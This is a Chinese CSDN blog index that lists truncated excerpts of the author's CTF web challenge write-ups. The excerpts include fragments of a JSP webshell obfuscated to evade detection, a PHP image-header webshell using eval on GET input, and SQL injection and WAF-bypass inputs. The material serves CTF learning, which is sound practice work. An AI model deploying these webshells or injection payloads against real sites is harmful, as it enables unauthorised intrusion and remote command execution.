qq_42158602的博客

私信 关注
Fstone2020
码龄3年
  • 12,468
    被访问量
  • 14
    原创文章
  • 335,025
    作者排名
  • 6
    粉丝数量
  • 于 2018-05-07 加入CSDN
获得成就
  • 获得8次点赞
  • 内容获得6次评论
  • 获得17次收藏
荣誉勋章
TA的专栏
  • CTF
    14篇
  • 最近
  • 文章
  • 资源
  • 问答
  • 课程
  • 帖子
  • 收藏
  • 关注/订阅

huaiweictf 部分 web

webWEBSHELL_1免杀shell<%@ page contentType="text/html;charset=UTF-8" language="java" %><% if(request.getParameter("cmd")!=null){ Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117,
原创
53阅读
1评论
0点赞
发布博客于 4 月前

[2020hxb] 部分wp

webweb1 题目名字不重要反正题挺简单的就在phpinfo里面 。。。。源码放一下 感觉200分没这么好拿的样子,可能有别的解法。<?phperror_reporting(0);//I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker.if ( isset($_GET['file']) ) { $file = $_GET['file'];
原创
63阅读
0评论
0点赞
发布博客于 5 月前

2020CISCN 西南赛区 部分web

就做了两道题,一天做一道,一道坐一天。 @(huaji_han)简单的web题目发现有源码泄漏 www.rar有发现有key.php,里面发现有个shell<?php class XJNU{ private function flag(){ echo $flag; } } if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['f'])){ die("do not attack
原创
80阅读
0评论
0点赞
发布博客于 6 月前

2020重庆市教育局网络安全攻防比赛

crypto1密文Jxyi yi oekh tqo.Jxyi yi oekh suburhqjyed., qdt jxu vbqw yi vv97v97t5t1ss32t9q5u62s2uu1t2v2s, ikrcyj myjx vbqw qdt {}该题是替换密码直接用在线网站爆破https://quipqiup.com/多确定两个完整的单词后 结果就出来了明文This is your day.This is your celebration., and the flag is ff9
原创
2439阅读
5评论
1点赞
发布博客于 7 月前

WMCTF2020

webweb_checkin源码<?php//PHP 7.0.33 Apache/2.4.25error_reporting(0);$sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);@mkdir($sandbox);@chdir($sandbox);highlight_file(__FILE__);if(isset($_GET['content'])) { $content = $_GET['content
原创
354阅读
0评论
0点赞
发布博客于 8 月前

DASCTF2020 7月月赛

bullshit题目from flag import flagdef pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flagdef encrypt(message): res = '' for i in range(0,le
原创
354阅读
0评论
0点赞
发布博客于 9 月前

BUUCTF [SUCTF 2019]CheckIn

拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功发现添加图片头文件就可以绕过GIF89a上传php文件的时候发现过滤了<?绕过检测<script language='php'></script>构造图片马GIF89a<script language='php'>eval($_GET['...
原创
537阅读
0评论
0点赞
发布博客于 1 年前

BUUTCTF [RoarCTF 2019]Easy Calc

查看一下源码发现计算的时候请求了一个calc.php发现过滤了一些特殊字符直接传num=phpinfo() ,发现请求失败,应该是被防火墙过滤掉利用php的解析特性,绕过防火墙检测。因为php解析GET POST请求的时候会自动过滤掉空格,而防火墙不会。如:num=phpinfo()%20num=phpinfo()在php解析的时候就是一个东西,防火墙则会当成两个变量成...
原创
636阅读
0评论
0点赞
发布博客于 1 年前

BUUCTF [强网杯 2019]高明的黑客

根据提示在url/www.tar.gz拿到源码随便打开几个看看有很多shell 不过都是些不能用的 由于文件太多还是些脚本跑吧 (python3)import osimport reimport requestsfrom multiprocessing import PoolfilePath = "E:\phpstudy_pro\WWW\src"url = "http://1...
原创
439阅读
0评论
1点赞
发布博客于 1 年前

BUUCTF [HCTF 2018]admin

第一步打开网址,就一个欢迎界面 旁边下拉菜单有个登录和注册界面查看一下源码有个注释 应该是提示我们用admin账号登录先随便注册一个账号看看登录成功后有三个界面随便看了看 先去登录注册页面试试有什么注入没有在注册界面试了一下约束攻击,密码随便输了一个123 — 这时的我还不明白事情的严重性报错了 ,好像没行。不过这界面还能运行python可以看见一些东西 ,感觉...
原创
487阅读
0评论
0点赞
发布博客于 1 年前

BUUCTF [SUCTF 2019]EasySQL

打开界面试了一下有三种显示还有一个没有输出可以堆叠注入1;show databases; 1;show tables; 可以看到有一个Flag表测试发现from flag都被过滤不能直接读到flag想了很久想不到 看别人wp了~看见听说比赛的时候原理泄漏了的select $_GET['query'] || flag from flag是这样 md 谁想的到啊 别...
原创
5068阅读
0评论
3点赞
发布博客于 1 年前

BUUCTF [强网杯 2019]随便注

打开题目看见一个输入框输入’报错 应该是有sql注入了使用 1’ # 正确显示直接上 order by1' order by 3 #测试1,2正常,3报错此时天真的我以为我已经离成功不远了~~启动联合查询-1' union select 1,2 #提交继续...
原创
777阅读
0评论
1点赞
发布博客于 1 年前

BUUCTF [护网杯 2018] easy_tornado

打开看见三个文件/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secret+md5(filename))根据提醒 flag应该在/fllllllllllllag中了直接访问发生错误?filename=/flag.txt&filehash=5d31fc5ca8f9b...
原创
314阅读
0评论
1点赞
发布博客于 1 年前

BUUCTF [HCTF 2018] WarmUp

开局一张图 直接查看源码发现注释source.php访问获得源码<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"s...
原创
364阅读
0评论
1点赞
发布博客于 1 年前